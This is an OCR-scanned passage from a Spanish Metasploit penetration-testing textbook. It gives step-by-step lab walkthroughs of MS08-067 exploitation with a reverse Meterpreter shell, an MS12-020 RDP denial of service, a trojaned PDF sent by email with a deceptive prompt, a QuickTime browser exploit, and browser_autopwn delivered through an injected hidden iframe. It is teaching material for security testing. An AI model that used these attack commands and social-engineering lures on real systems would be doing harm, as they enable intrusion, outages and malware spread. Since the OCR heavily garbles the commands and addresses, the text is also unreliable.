windows /messagebox 

windows/meterpreter/bind_ipv6 tcp 

(Reflective injection), Bind TCP Stager (1Руб) 
windows/meterpreter/bind_nonx_tcp | 

(Reflective Injection), Bind TCP Stager {Мо NX or Win7) 
windows/meterpreter/bind_tcp 

(Reflective Injection), Bind TCP Stager 
windows/meterpreter/find_tag 

(Reflective Injection), Find Tag Ordinal Stager 

windows/meterpreter/reverse http 


normal Windows Meterpreter 


normal Windows Meterpreter 


normal Windows Meterpreter 


normal Windows Meterpreter 


Fig 3.01: Ejecución de show payloads. 


La elección del payload es fundamental, y puede llevar a la prueba al éxito o al fracaso. En 
condiciones normales, para poder realizar la prueba de explotación valdría con un exploit de tipo 
single, el cual deje una evidencia de que se ha ejecutado código arbitrario en el sistema. 


También hay que tener claro que, generalmente, los test de intrusión no es sólo ejecutar código 
arbitrario en una máquina remota, ya que se pueden utilizar estas máquinas vulneradas para acceder 
a recursos más interesantes en una organización y conseguir mejores resultados, Es por esta razón 
que los tipos stagers son también muy interesantes y útiles en algunos escenarios. 
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3. intrusión sin interacción 


El lanzamiento de exploits sobre máquinas objetivo sin interacción por parte del usuario es uno de los 
puntos que más puede asustar a los usuarios y propietarios de máquinas o empresas. Esta situación 
es crítica ya que si ила máquina es vulnerable a un exploit el cual no requiera de interacción por parte 
del usuario, cualquier atacante podría tomar el control remoto de dicho equipo sin que el usuario 
notase, a priori, nada extraño. 


A continuación se van a proponer algunos ejemplos mediante el uso de pruebas de concepto en el 
que se podrá estudiar la configuración y ejecución de este tipo de exploits y situaciones. 


PoC: La primera intrusión 

lin esta prueba de concepto se hará uso de la vulnerabilidad MS08-067, de la que se puede obtener 
más información y detalles en el siguiente sitio web http: i/www.microsoft.com/latamitechmet/ 
seguridad/boletines/2008/ms08-067.mspx. 


En primer lugar, tras arrancar msfconsole, se puede realizar una búsqueda por servicio, tecnología, 
aplicación, mediante el comando search, por ejemplo search пегарі. Se obliene así una lista con los 
módulos que encajan con el patrón de búsqueda introducido anteriormente, 


А. 
just > search netapl 


Ё Searching loaded modules for pattern 'netapi'... р 


xploits 

Name Disclosure Date Rank Description | 

vwindows/smb/ms03_849 netapí 2803-11-11 good Microsofi Workstation Service NetAddAltej 
rnatecomputerName Overflow 

windows/smb/ms06_048 netapi 2886-88-68 great Microsoft Server Service NetpwPathCaneni 
calize Overilow 

windows/smb/ms06_079 wkssvc 2806-11-14 manual Microsoft Workstation Service Netpianage 
грссоппесї Overflow 

windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path 5 


ack Corruption 


Fig 3.02: Búsqueda de módulos con el comando scarch. 


En este punto ya se dispone de la ruta donde se aloja el módulo que se requiere, en este ejemplo sería 
exploithvindows/smb/ms08_067_netapi. Para cargar el módulo se utiliza el comando use, y una vez 
cargado se pueden configurar sus variables para lanzar el exploit sobre el objetivo. El сиа en esta 
prueba de concepto es una máquina Windows XP SP3 spanish. Este exploit se puede utilizar sobre 
una gran cantidad de objetivos, cubriendo Windows 2000, 2003 y ХР con SP2 y SP3. 


Пау que recordar que los comandos info о help ayudan a obtener información sobre el módulo 
o sobre los comandos que se pueden utilizar. Además, el comando show aperta información, por 
ejemplo, sobre las opciones con las que se puede configurar el exploit y las opciones que dispone 
el payload, o los payloads disponibles para este módulo con show payloads, o incluso los fargei 
compatibles con el módulo con show targets. 
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asf > use exploit/windows/smb/ms68 067 netapi 
mst exploit(ms08_067_netapi) > show options 


Module options (exploit/wirdows/smb/ms08_867_netapi); 
Маме Current Setting Required Description 


RHOST yes 


The target address 
RPORT 445 yes Set the 5ИВ service port 
SMEPIPE BROWSER yes, The pipe name to use (BROWSER, SRVSVC) 


exploit target: 


15 Name 


€ Automatic Targeting 


msf exploit(ms08_867_netapi) > set PAYLOAD windows/meterpreter/reverse_tep 
PAYLOAD => windows/meterpreter/reverse_tcp i 
ms? exploit(ms08_067_netapi) > set RHOST 192.168,1.37 

RHOST => 192.168. 


Fig 3.03: Carga del exploit y configuración del módulo. 


і 


Una vez cargado el módulo, si se ejecuta show options se muestran las variables para configurar el 
exploit. En este ejemplo, se configura la variable RHOST para indicar cual es la máquina objetivo. ` 
Además, se debe indicar en la variable PAYLOAD cual de ellos se quiere ejecutar. Una vez indicado , 
el payload si se vuelve a ejecutar el comando show options se puede observar como aparecen, 
además de las variables de configuración del exploit, las variables de configuración del payload. 


pa exploit (ms08_067_netapi] > show options | 


н options lexploit/wimiows/smb/ms98_067_netapi): 


Name Current Setting Required Description 
RHOST 192.168.1,37 Yes 

RPORT 445 yes 
ЅИВРІРЕ BROWSER yes 


The target address 
Set the SMB service port 
The pipe name to use (BROWSER, SRVSVC) 


Payload options (windows/meterpreter/reverse_tcp): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique: seh, thread, process, nene 
LHOST yes The listen address 

LPORT 4444 yes The listen port 


| 
КЕШ: target: 


1d tame 


0 Automatic Targeting 


asf ехр1о11{т5ПВ8_067_пеїар1) > set LHOST 192,168.1.35 
LHCST_=> 192.168.1.35 


Fig 3.04: Carga del payload y configuración del módulo. 


Es muy interesante entender distintos conceptos en el comportamiento de los payload en función 
de si son inversos, reverse, o directos, bind. En la prueba de concepto se ha utilizado un payload 
ineterpreter de conexión inversa, por lo que se debe confi gurar al código del payload dónde se debe 
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conectar mediante la variable LHOST, es decir, a la dirección 1P del atacante o de un servidor que 
recoja las conexiones que se encuentre bajo el contro! del atacante. 


Por otro lado, se podría haber utilizado un payload con conexión directa, bind. En ese caso, en vez 
de aparecer la variable LHOST en la configuración del payload, apareceria la variable RHOST, 
que debe ser la dirección 1Р de la máquina a la que se quiere acceder. Hay que recordar que en un 
payload de conexión directa, es el auditor quién se conecta a la víctima. Tras el lanzamiento del 
exploit, se deja en un puerto a la escucha, por ejemplo, una shell, у es entonces el auditor quién se 
conecta a ese puerto dónde espera la shell remota. 


Conexión Inversa 


1. Auditor lanza exploit 

2. Ejecución de código en máquina remota 

3. El payload se conecta a la dirección que se configuró en 
la variable LUOST 


sl 4. La variable LHOST puede ser la dirección LP del auditor 
x otro servidor manejado por el auditor que recoje conexiones 


Conexión Directa 


т 1. Auditor lanza ехріон 
2. Ejecución de código en máquina remota 
3. Se deja en un puerto una shell 

4. La variable RHOST del payload debe ser la dirección 
1P de la victima. Audilor conecta con esa IP y puerto 


Fig 3.05: Detalle de la conexión de los payload. 


El comando check permite verificar si el equipo remoto es vulnerable al módulo cargado, por eslo, 
antes de lanzar el exploit se puede utilizar este comando para verificar la vulnerabilidad. Una vez 
verificada se lanza el comando exploit, y se obtiene la sesión remota, en este caso de melerpreter. 


{*] Verifying vulnerable status... (path: 9x99098952) 
{+} The target is vulnerable. 
st exploit(ms08_967_netapi) > exploit 


[+] Started reverse handler оп 192, 168.1.35:4444 

[+] Automatically detecting the target... 

1+) Fingerprint: Windows ХР - Service Pack З - lang:Spanish 

{+} Selected Target; Windows ХР SP3 Spanish (NX) 

[*] Attempting to trigger the vulnerability... 

[+3 sending stage (749956 bytes) to 192.168.1.37 

{+1 Metecpreter session 2 opened (192.168.1,35:4444 -> 197,168.1.37/1943) at 2812-06-24 17:48:05 
+8280 


Fig 3.06: Explotación de la máquina Windows XP SP3 spanish. 


PoC: Denegación de servicio y las pérdidas 

En esta prueba de concepto no se realiza un proceso de intrusión, pero sí se comprueba la seguridad 
de los servicios de los que puede disponer una empresa, cuyas caídas pueden provocar pérdidas a 
éstas, ya sea de forma privada o pública, En este ejemplo se utilizará la vulnerabilidad M812-020 de 
la que se puede obtener mayor información en la siguiente URL: htup://technet.microsoft.com/es-es/ 
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security/bullerin/ms 12-020. La máquina objetivo en el siguiente escenario será un Windows 7 con 
SP1 de 64 bits. También son posibles /argets las siguientes versiones de los sistemas operativos XP, 
2003, 2008 ó 2008 R2, 


Зп primer lugar, la víctima debe disponer de una configuración concreta de su servicio de escritorio 
remoto. Como se puede visualizar en la imagen existen 3 opciones en Windows 7, lógicamente, si no 
se permiten conexiones no se podrá realizar la denegación de servicio, y por otro lado, si se configura 
que sólo se permitan las conexiones desde equipos que ejecuten escritorio remoio con autenticación 
a nivel de red tampoco. Por lo que si la víctima dispone de la configuración permitir conexiones 
que ejecuten cualquier versión de escritorio remoto, puede ser vulnerable si по ha actualizado con 
la corrección de la vulnerabilidad. 


[ Езсйойо remolo 
Haga.clic en una opción y después especifique quién puede 


сопесіатве, st fuera necesaro. 
© Ho permitir las conexiones a este equipo 


‚ €) Permitir las conexiones desde equipos que ejecuten 
cualquier versión de Escritoño remolo (menos seguro) 


8) Реппйїг sólo las conexiones desde equipos que ejecuten Escrtorio 
remoto con Autenticación a nivel de red (тёз seguro) 


Fig 3.07: Configuración escritorio remoto en Windows 7. 


Para obtener el módulo se puede descargar directamente en la siguiente web wwwmetasploit. 
com/mnoduleslauxiliary/dos/windows/rdp/ms12_020_maxchannelids teniendo en cuenta que es un 
módulo de tipo auxiliary. . 


> searcn ms 


Matching Modules 


A 


Hame Disclosure Date Rənk Description 


Remote Desktop Use-After-Free DoS 


> use auxiliory/dos/windows/rdp/ms12 020 maxchannelids 
sf auxiliary(as12 620 maxchannetids) > show options 


Module options (auxiliary/dos/windows/rdp/ms12 020 maxchannelids): 


RHOST The target address 
RPORT 3399 yes The target port 


msf auxiliary(ms12 020 _maxchannelids) > set RHOST 192.168.9.55 
RHOST => 192.168.0.55 
msi auxiliary(ms12-829 maxchannelids) > run 


{*] 197.168,0.55:3389 - Sending MS12-929 Microsoft Remote Desktop Use-After-Free 005 
[+] 192.168.0.55:3389 - 210 bytes sent 

1*] 192.168.0.55:3389 - Checking RDP status... 

[1] 192.168.0.55:3389 seems down 

[+] Auxiliary module execution completed 


Fig 3.08: Denegación de servicio del escritorio remoto de una máquina Windows 7. 
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Una vez se dispone del módulo en el framework se accede a él y se configura, de manera sencilla, 
el equipo remoto al que se quiere denegar el servicio. Si todo va bien, se obtendrá un mensaje que 
enuncia seems down. 5: la máquina a auditar dispusiera de un servicio de escritorio remoto en otro 
puerto que no sea el de por defecto, se puede utilizar la variable RPORT para indicar cual es el puerto 


que se está utilizando. 


Parece que todo ha funcionado correctamente y que la máquina ha caído. En función de la 
configuración de la máquina ésta se reiniciará tras realizar un volcado de memoria. ¿Y si tras 
volverse a levantar se le vuelve a realizar una denegación de servicio? ¿Y si la máquina no está 
configurada para reiniciarse y queda fuera de servicio hasta su reinicio manual? Estas preguntas son 
bastante lógicas, y la realidad es que si la máquina es vulnerable la empresá tiene un gran problema, 
ei cual debería ser solucionado con la aplicación del parche para evitar este agujero, 


обет. has heen detected. and Arindows 


| has: been shut diwi to prevent, damage 
Өй. COMPuter o. е И т 


ОРО, БҮЗ 
PAGE FAULT_TH_NONPAGED,. АВЕА 


E this ts tha first time you've seen this stop error screen, 
Pástart yor computer, IF this screen. appears agaibh, FoTloyw 


these steps? 


check то маке sure апу пем hardware or software 45 properly installed. 
І. this. 15 a пау installation, ask your hardware orosoftwane manufacturer 
For. any Windows updates you night need. д 


те problems continue, disable оў remove any newly installed hardware 
or software. Disable BIOS nemory options such as caching or shadowirig. 
1f you need to use safe Майа to remove or disable components, restart 
¡yoyr computer, press Р8 to select Advanced Startup Options, and then 
sélect safe mode,- І | Ei 


chnical inforiatlon: 


уйн STOP: OXOO0ODO30 (OXCSESBAOC, 0Х00000000, OXBFAFFAEE, 0х00000007) 
¿RDPWD.SYS = Address SFAFFAEE hase at SFAEOOOO, Datestamp 4áibcaea 


coTlectáng data for crash дойр. 
Initiaidzing d15k: For crash. dump, ip. 
: ing отр 206. physical meno 

dphys]cal memory to disk: La 


Fig 3.09: Pantallazo azul de Windows 7 tras la denegación de servicio, 


4. Intrusión con interacción 


Client side attack o ataques del lado del cliente, son ataques que permiten al atacante tomar el 
control de una máquina víctima explotando una vulnerabilidad de una aplicación que es ejecutada 
por el usuario. Este tipo de ataques son muy frecuentes, cada vez $on más complejos y provocan que 
la víctima no sepa realmente lo que está haciendo con su máquina. 


Esta técnica consiste en crear, ya sea un fichero, un servicio, o una aplicación, con fines maliciosos 
con el objetivo de obtener acceso a la máquina de la víctima, ya sea por red local о por Internet. 
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Metasploit ayuda mucho en este tipo de ataques y en este apartado se demostrará la flexibilidad a à 
hora de pensar en un ataque de este tipo. 


A continuación se proponen distintos escenarios y pruebas de concepto con los que el lector pued 
asimilar la técnica y los conceptos de manera sencilla y rápida. i 


PoC: Los archivos adjuntos pueden ser muy peligrosos 4 
En esta prueba de concepto se utilizará la posibilidad de crear archivos maliciosos con el fin de qué 
las víctimas lo ejecuten mediante el uso de una aplicación vulnerable. En la prueba se utiliza un 

vulnerabilidad de la famosa herramienta Adobe Reader, la cual es vulnerable en sus versiones 8.x y 
9.x del producto. 4 


En este ejemplo se ha decidido explotar esta vulnerabilidad debido а que afecta a los archivos POH 
muy utilizados en Internet, y a una de las herramientas que disponen la mayoría de los usuarios para 
visualizar este tipo de archivos. Existen otras vulnerabilidades de este tipo, comúnmente conocidas 
como FileFormat, en el que se pueden crear documentos ofimáticos de aplicaciones muy utilizadad 
como Word o Excel, o archivos de listas de reproducción de iTunes, cuyos fines son maliciosos. { 


Una de las vias de distribución de este ataque sería, por ejemplo en el contexto de una gran empresa{ 
el correo electrónico. Mediante la utilización de un servidor de correo electrónico se podría hacer, 
llegar este tipo de archivos a toda una organización y con alta probabilidad habría usuarios que 
ejecutarían estos archivos. Otra de las vías, sería colgar estos archivos en foros, blogs, sitios webi 
bajo el control del atacante, etcétera. Como siempre, todo depende de la imaginación del atacante y 
de la calidad de su ingeniería social. z | 


| 1 
El escenario que se propone en esta prueba de concepto es que un atacante prepara un documento 


PDF en el cual se inyecta un payload de tipo Meterpreter. Este archivo utilizará una plantilla, es 
decir, un documento PDF real que será el que se visualizará cuando la víctima lo ejecute, Además,: 
cuando la víctima lo ejecute, si su aplicación Adobe Reader es vulnerable se ejecutará el payload. El 
atacante realizará la distribución mediante el uso del correo electrónico, como archivo adjunto, El 
atacante deberá cargar el módulo exploit/multi/handler para recoger las distintas conexiones que se: 


obtengan por las explotaciones realizadas con éxito mediante el archivo PDF malicioso, | 
ч 


El exploit se encuentra alojado en exploitAvindows/fileformat/adobe _pdf_ embedded ехе en la ruta: 
relativa a msfconsole. Si se miran los targets, se encuentra que sólo funciona para Windows XP 


-SP3 versión inglesa. Si el objetivo son víctimas con sistemas operativos en otro idioma, el ataque: 


por defecto no funcionará. Existe una fácil solución y es modificar el script en Ruby y añadir 10 
necesario para que el exploit funcione en sistemas operativos con la versión española. 


El exploit se encuentra en la ruta ¡pentest/exploits/framework3/modules/exploits/windows/ 
Hhleformat/adobe_pdf_ embedded exe.rb ó /opt/opt/metasplot13/msf3/modules/exploits Awindows/ 
Jileformat/adobe_pdf_ embedded _exe.rb. Para modificar el exploit y que funcione en Windows XP 


SP3 en español se debe localizar la siguiente línea en el código, 
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dirs = [ “Desktop”, “Му Documents”, “Documents”] 


Simplemente se deben añadir los siguientes nombres a la anterior linea. 


dirs = [ “Desktop”, “Му Documents”, “Documents”, “Escritorio”, “Mis Documentos”, 
“Documentos” ] 


Una vez modificado el script se debe arrancar msfconsole y se podrá utilizar el nuevo móduio 
modificado. En la siguiente tabla se pueden visualizar algunos parámetros interesantes a configurar 
(газ la carga del módulo adobe _pdf embedded ехе. 


| Parámetro Valor 


EXENAME Nombre del ejecutable del payload, si no se indica se ашорепегя uno. 
FILENAME Se indica el nombre que recibirá el PDF malicioso. 


Se indica la ruta donde se encuentra el PDF real que se utilizará para 


INFILENAME A 
mostrar a la víctima. 


Mensaje que visualizará la víctima, el cual si ejecuta se realizará la 


LAUNCH_MESSAGE R A 
з explotación. Debe ser un mensaje creíble. 


Tabla 3,01: Configuración del módulo adobe _paf_embediied exe. 


INFILENANE => /root/Desktop/miPlantilla. pdf 

asf exploitladohe_pdf_embedded_exe) > set QUTPUTPATH /root 
OUTPUTPATH => froot 

asf exploit(adobe_pdf_embedded_exe) > show options 


Module options (exploit/windows/fileformat/adobe pdf embedded exe): 


Name Current Setting 
Required Description 


A ë mmopeneneny 


EXENAME 
no The Name of payload exe. 
FILENAME evil.pdf 
no The output filename. 
INFILENAME /root/Desktop/miPlantilla.pdf 
yes The Input PDF filename. 
LAUNCH MESSAGE То view the encrypted content please tick the "Do not show this message again 
“ box and press Open, no The message to display іл the File: area 
OUTPUFPATH ¿root 


yes The location of the file. 


Fig 3.10: Configuración para la creación del PDF malicioso. 


Además, hay que configurar el parámetro PAYLOAD, en este ejemplo se ha utilizado set PAYLOAD 
windows/meterpreler/reverse tcp. Indicando а qué IP se tiene que conectar el payload. 


Una vez configurado se ejecuta el comando exploit y se genera el fichero PDF malicioso. Se puede 
empezar la distribución mediante el correo electrónico, pero a la vez se debe estar preparado para 
recibir las conexiones o sesiones remotas. Para ello se carga en ms/console el módulo exploit/multi/ 
handler. Este manejador sirve para que cuando la víctima ejecute el archivo y el payload realice 
la conexión inversa al atacante, este módulo gestionará este proceso dando acceso al atacante a la 
máquina remota. | 
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Este módulo se configura de manera sencilla, simplemente se debe indicar que tipo de payload se 
espera y cual es la dirección IP local, es decir, a la que el payload se va a conectar. 


msf exploit(handler) > set PAYLOAD o уге Че Tep] 
PAYLOAD => windows/meterpreter/reverse_tcp | 
msf exploit(handler) > set LHOST 192.168.8.62 

UHOST => 192.168.6.62 | 


Fig 3.11; Configuración del manejador de Metasploit. 


асаана 


Una vez que las posibles víctimas han abierto el correo, han ejecutado el archivo PDF y disponen de 
una versión de la aplicación vulnerable se muestra un warning al usuario. Es por ello que el mensaje 
que se introduzca en el parámetro LAUNCH MESSAGE es importante que sea creíble, un loque 
de ingeniería social. El usuario pulsa sobre open y se estará ejecutando el payload en la máquina de 
la víctima. 


w 
тА, 


sueba de 164 con un pdf maligno] ¿252 


[ Про not show this message адап 


Fig 3.12: Ejecución del PDF por parte de la víctima. 


La explotación devuelve una consola de Meterpreter y el usuario o victima puede seguir visualizando 
el PDF, el cual muestra el contenido de la plantilla utilizada para crear el PDF malicioso, 


| 


emsf expioit(handler) > exploit 


[+] Started reverse handler on 192.168.9.62:4444 

[*] Starting the payload handler... 

(*] Sending stage (749056 bytes) to 142.168.0.61 | 

[+1 Meterpreter session 1 opened (192.168.0.62:4444 -> 192,168.9.61:2321) at 2012-06-27 03:09:21 
+0209 


meterpreter > background 1 
msf exploit(handier) > sessions -l 


Active sessions 
AAA 


Id Туре Information Connection 


192.168.0.62:4444 -> 192.168,0.61:2321 


1  meterpreter x86/win32 


Fig 3.13: Obtención de la sesión inversa de Meterpreter. 


PoC: QuickTime y sus conexiones por Rubén Santamarta 
A finales del año 2010, salió una de las vulnerabilidades más importantes en los últimos tiempos 
en lo que se refiere a Apple y sus productos. Rubén Santamarta, investigador español de seguridad 
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y muy conocido como reversemode, sacó a la luz pública esta vulnerabilidad y su correspondiente 
exploit el cual permitía a un atacante ejecutar código arbitrario en las versiones XP de Windows con 
SP3. Esta vulnerabilidad se encontraba escondida en QuickTime Player y llevaba 9 años ahi, La 
vulnerabilidad se debe a un parámetro denominado _Marshaled_pUnk, en el visor de QuickTime 
que se utiliza para cargar elementos desde la ventana. según comentaba Rubén Santamaria, cuando 
publicó su exploit еп el artículo http://www. reversemode.com/index. php?option=com_contentéiask 
=viewkid=694ltemid=1, parece que alguien se olvidó de | implar esta funcionalidad. 


E! día después de que Rubén liberase este Oday que afectaba a las últimas versiones de QuickTime, 
por aquel entonces la 7.6.6 y la 7.6.7, los desarrolladores de Metasploit liberaron un módulo para el 
framework. 


EI escenario de la prueba de concepto es el siguiente: existe un atacante, con una distribución 
BackTrack que quedará a la espera de que las víctimas, que ejecuten una versión de QuickTime 7.0.7 
o inferior, se conecten a un recurso propuesto por el atacante. ¿Cómo se logra que las víctimas se 
conecten a ia máquina del atacante? Esta pregunta tiene muchas respuestas, y normalmente se puede 
contestar con la palabra imaginación. No existe un método único, y siempre cada método puede 
ser ejecutado con toques interesantes de creatividad e imaginación. Por ejemplo, el atacante puede 
haber distribuido una gran cantidad de links por foros, blogs, redes sociales, correos electrónicos, 
etcétera que redirijan a una víctima a la dirección IP y al recurso malicioso del atacante. En muchas 
ocasiones, la víctima no será vulnerable al exploit, ya sea porque no dispone de esa aplicación, o 
porque la aplicación está parcheada. 


Otro método interesante es interceptar el tráfico de las víctimas, encontrándose en la red local del 
atacante y redirigirla hacia el recurso malicioso. Quizá uno de los métodos más interesantes, y que 
es muy utilizado en el mundo real para distribuir malware, es disponer de una serie de páginas 
hackeadas a las que se coloca un iframe transparente que apunta hacia el recurso malicioso. En 
este caso cuando la víctima entra a la página web real, su navegador carga el iframe, el cual apunta 
hacia el recurso malicioso y se puede llevar a cabo la explotación, sin más interacción por parte de 
la víctima que el simple acceso a un sitio web, 


[nsf > search marshaled 
[+] searching loaded modules for pattern 'marshaled'... 


HA 


Name Disclosure Date Rank Description 


З A ЧОО A EA AA es.. ermano 


windows /browser/apple_quicktime_marshaled punk 2818-08-38 great Apple QuickTime 7.6,7 
_Harshaled рупк Code Execution 


psf > use exploit/windows/browser/appte_quicktime_marshaled punk 
msf expleit(anple quicktime marshaled unk) > 


Fig 3.14: Carga del módulo marshaled_punk para Apple QuickTime 7.6.7. 


Tras buscar marshaled en el framework se carga el módulo y se prepara el entorno para que cuando 
el cliente realice la petición y ejecute la aplicación vulnerable, client side attack, el exploit realice el 
trabajo y devuelva el control de la máquina remota. NA 
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ҮЙ 


Id Name 


0 Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3 


msf exploit(apple_quicktime marshaled_punk) > set ЅАУНОЅТ 192,168.0.62 
SAVHOST => 192. 168,0.62 
mf exploitiappte quicktime marshaled punk) > set SRVPORT В@ 
SRVPORT => 80 
psf exploit(apple_quicktime_marshaled_punk) > set URIPATH /juegas 
URIPATH => /juegos 
asf exploit(apple_quicktime_marsholed punk) > set PAYLOAD vwindows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp д 
msí exploit(apple_quicktime_marshaled punk) > set LHOST 192,168.0.62 
HOST => 142,168.8,62 


Fig 3.15: Configuración del módulo marshaled_punk. 


ку j . А А ` + | 
La configuración es sencilla, se deben asignar valores a las variables о a los parámetros siguientes: 


€ AA ышыгы РАННЕЕ 


Valor 


Parámetro 


SRVHOST La dirección 1P dónde se implementa el recurso malicioso o exploit 


Se debe indicar el puerto que quedará a la escucha, para simular un recurso 
web es importante asignarlo en el 80 


SRVPORT 


Recurso al que se quiere acceder. En el ejemplo se indica /juegos, pero 


bastaría con / 
A ыл ылыы л 


Se debe indicar el payload a ejecutar еп la máquina vulnerable 


URIPATH 


PAYLOAD 


Tabla 3.02: Configuración del módulo marshaled_purk 


msf exploit(apple_quicktime_marshaled_punk) > exploit 
[+] Exploit running as background job. 


[>] Started reverse handler оп 192.168.9.62:4444 

[+] Using URL: http://192.168.0.62:89/juegos 

[+] Server started. 

msf exploit(apple_quicktime_marshaled_ponk) > [+] Sending Apple QuickTime 7.6.7 Marshaled_pUnk 

Code Execution exploit HTML to 192.168,0.61:1635, ., 7 

[*} Sending stage (749056 bytes) to 192.168.8.6] 

[+] Meterpreter session 1 opened (192.168.0.62:4444 -> 192,168.0.61:1636) at 2912-06-27 02:16:09 
+0200 

t+] Session ID 1 (192.168.0.62:4444 -> 192,168,€.61:1636) processing InitialAutoRunScript *migra 
te f' 

[+] Current server process: IEXPLORE.EXE (2689) 

it] Spawning а notepad.exe-host process... 

[+] Migrating into process 10 4036 

[*] New server process: notepad.exe 


(4036) 


Dirección [8 http:/J192,169,0.62Jjue 


Fig 3.16: Explotación lograda con el módulo marshaled_punk, 


Metasploit para Pentesters 


2 


Pueden llegar peticiones de muchas víctimas, en función del método de distribución que se ha a 
realizado, cuantas más peticiones lleguen mayor probabilidad de éxito. Aunque un concepto pe 
quedar claro y es que cuando se descubrió esta vulnerabilidad y fue liberada por Rubén Santamarta 
era un Oday por lo que no existía actualización que parchease el fallo. Lo importante del еи lo 
es ver y entender los peligros que disponen las aplicaciones no actualizadas y los fabricantes Е 
son rápidos ante las salidas de los temidos Oday. 


Dark Shadows, el mundo oscuro y real 

La industria del malware y el fraude online sigue siendo, a día de hoy, el gran motor de esta industria 
| п indicador de este hecho ез el número de copias únicas de malware que se ha disparado en los 
últimos años. En primer lugar, hay que recordar que el spam, en especial el farmacéutico. si nie 
stendo la vía de distribución elegida, que el malware sigue creciendo. que los Mac OS X i 
en auge y que Jos dispositivos móviles son un objetivo ya atacado, Además en infraestructuras 
importantes se han descubierto vulnerabilidades críticas y el número de је de se ridad 
descubiertos por año sigue siendo un número muy alto. j 
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* Blackhole v.1.0.0 


Fig 3.17: Kit de explotación Black Hole. 
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Una de las vías más importantes para la distribución de malware son los sitios web, utilizando un kil 
de explotación, como puede ser Black Hole, Eleonore o Phoenix Exploit. Estos kit de explotación 
disponen de gran cantidad de exploits públicos y, si se paga lo suficiente en el mercado underground, 
de exploits privados. Dichos exploits privados proporcionan al atacante una ventaja sobre muchos de 


los usuarios que caerán en sus redes con fines maliciosos, 


Además, disponen de paneles que aportan facilidad de uso y gran información. Muchos de ellos 
ofrecen estadísticas de los navegadores explotados, los países de las víctimas, porcentaje de éxito, 
exploits que niás acierto han tenido, el sistema operativo más explotado, etcétera. 


BI proceso no es trivial pero una vez estudiado no es de gran complejidad. La idea es que el atacante 
selecciona las víctimas a través de un programa automático que busca patrones en los buscadores 
como Google о Bing. Una vez se obtiene la lista de sitios que son vulnerables, se realizan ataques 
SQL Injection a todos ellos, cuyas inyecciones están preparadas para introducir código malicioso en 
la página web. El código malicioso que se introduce carga el contenido de una dirección que será 
dónde se encuentre el ki! de explotación. De este modo, cuando un visitante navegue por el sitio web 
vulnerado será atacado con un exploit que tratará de ejecutar un malware en su máquina. 


Como ejemplo de un hecho real se muestra a continuación uno de los varios ataques sufridos por la 
web de Apple. También hay que decir que Apple ha trabajado siempre de manera rápida para limpiar 
toda referencia a sitios web maliciosos. En la imagen se puede visualizar como se inyectó un iframe 
que referenciaba al sitio web malicioso en el interior del sitio web de Apple. El sitio al que se referían 
era al dominio nemohuildiin, ru, pero la víctima podría no detectar ninguna acción extraña ya que si 
el iframe fuese transparente no se visualizaría nada extraño. 


| Buscar 


: site:apple.com nemohuiidiin.ru 


2 regulados (0,58 segundos) | Búsqueda avanzoda 


Build For Change Digest<iframe src="hMp://nemohulidiin, ruäds/go ... YY - { Traducir esta página ] 
Download or subscribe to-ftes podcast episodes from Build. For Change Digest. 
itunes. appte.convus/poucasl!...fid293559047 -Estados Unidos -En caché 


Change - Download free podcast episodes by Scherkenbach on iTunes. т - { Tratiucir esta página ] 


Build For Change Digest<iframe sic="hltp://nemolndidión suñdstgo php?7sid=1" widih="0" 
height="0" style="display:nane"></ífreme>; Кен @реда.сот ... 
itunes apple. canvkz/padcasí/...Ad105615229 - Estados Unidas - En caché 


Fig 3.18: Búsqueda de sitios hackeados que distribuyen malware. 


PoC: La técnica Browser Autopwn 
En la siguiente prueba de concepto se utilizará el módulo browser_autopwn, еі cual ofrece la 
posibilidad de lanzar exploits de acuerdo a la versión del navegador que la víctima esté utilizando. 


El escenario dispone de 2 máquinas, una será el atacante соп un equipo Windows XP SP3 que dispone 
de un servidor WAMP el cual ofrecerá una página web maliciosa, simulando un sitio hackeado, dicha 
página web dispondrá de un ¿frame transparente que referencia a una máquina donde se encuentra el 
módulo browser_autopwn esperando para lanzar los exploits. En el escenario el módulo se encontra rá 
en un Metasploit en la misma máquina del МАМР, es decir, en la máquina del atacante. Por otro 
lado, se dispone de una máquina que será la de la víctima, corriendo un Windows АР SP3, en la 
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que simulando una navegación hacia la web hackeada y que ha sido modificada con la Inyección 
del iframe malicioso será vulnerada рог esta técnica. Una vez que se obtenga el control remoto de 
la máquina de la víctima se realizará la distribución de malware, en esta prueba de concepto se 
utilizará DarkCommet. La distribución y ejecución de malware se realizará a través de la consola de 
Meterpreter. Con este método se pueden obtener gran cantidad de máquinas iroyanizadas, pudiendo 
Ser parte de una bornet sim plemente por navegar por sitios hackeados. 


La máquina del atacante dispone de la dirección IP 192.168.0.56, en ella sc aloja el sitio web malicioso 
y el módulo de Metasploit. La máquina de la víctima dispone de la dirección 1P 192.168.0.57 para 
la siguiente prueba de concepto. | . 

В | 


En primer lugar, se ha instalado un servidor WAMP en la máquina del atacante y en la ruta wamp/ 
www se ha colocado un sitio web que simula la página rea] que sé encontraría hackeada. La Página 
web puede ser clonada con distintas herramientas, por ejemplo 72/ероғу. Hay que dejar el módulo, 
de tipo auxiliary, browser_autopwn preparado para recibir las conexiones y que pueda lanzar los 
exploits. La configuración se puede visualizar en la siguiente tabla. 


| Parámetro | Valor | 
А 


———————.. 


LHOST La dirección ІР para las conexiones inversas de los payload 


o 


| URIPATH 


КЭК РО Se debe indicar el puerto por el que escuchará el módulo. 8080 es una buena opción 


Recurso 


al que se quiere acceder. En el ejemplo se indica / 


Tabla 3.03: Configuración del módulo browser_autopwn. І 


а аиел). э E 


Fig 3.19: Configuración del módulo browser_autopwn. 


Una vez que se dispone del módulo a la espera de recibir conexiones en el puerto 8080, se debe 
tener en cuenta que la web maliciosa debe cargar un iframe transparente que referencie en su ca тро 
sre a dónde se encuentra el módulo browser_autopwn. Para simular la inyección de código, como 


ocurriría en un itaque real, se edita el sitio web y se coloca el iframe como se puede visualizar en 
la imagen. 


т 5гс= 92 


ttp://192.168, 0. 56:8080 w+adrn=0 
аты dden" frameborder=0 marginhejght=0 


narginwidrh=0/> 
</bocys 
<hem} s 


Fig 3.20: Inyección de iframe en el código de la página web. 


Ahora solo queda esperar a que la víctima se conecte a la página web maliciosa y tras cargar su 
contenido, también cargará el iframe que realizará la petición a la dirección http:1/192.168.0.56:8080. 
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Generalmente en un ataque real, esta petición se realizaría a un dominio as cad 
